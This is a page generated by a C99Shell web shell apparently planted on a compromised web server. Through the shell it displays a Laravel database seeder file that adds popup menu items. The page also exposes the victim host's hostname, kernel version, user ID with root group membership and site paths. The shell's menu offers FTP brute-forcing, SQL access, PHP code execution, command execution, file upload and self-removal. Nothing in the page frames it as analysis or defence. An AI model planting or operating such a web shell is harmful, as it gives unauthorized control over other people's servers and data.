!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Popup/Database/Seeders/   drwxr-xr-x
Free 22.86 GB of 117.98 GB (19.37%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MenuItemsTableSeeder.php (1.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Modules\Popup\Database\Seeders;

use 
Illuminate\Database\Seeder;
use 
Illuminate\Support\Facades\DB;

class 
MenuItemsTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {
       
DB::table('menu_items')->upsert([
            array (
                
'id' => 81,
                
'label' => 'Add Popup',
                
'link' => 'popup/create',
                
'params' => '{"permission":"Modules\\\\Popup\\\\Http\\\\Controllers\\\\PopupController@create", "route_name":["popup.create"], "menu_level":"1"}',
                
'is_default' => 1,
                
'icon' => NULL,
                
'parent' => 73,
                
'sort' => 30,
                
'class' => NULL,
                
'menu' => 1,
                
'depth' => 1,
            ),
            array (
                
'id' => 64,
                
'label' => 'All popups',
                
'link' => 'popups',
                
'params' => '{"permission":"Modules\\\\Popup\\\\Http\\\\Controllers\\\\PopupController@index", "route_name":["popup.index", "popup.show", "popup.store", "popup.edit", "popup.update", "popup.delete"], "menu_level":"1"}',
                
'is_default' => 1,
                
'icon' => NULL,
                
'parent' => 73,
                
'sort' => 31,
                
'class' => NULL,
                
'menu' => 1,
                
'depth' => 1,
            ),
        ], 
'id');

    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--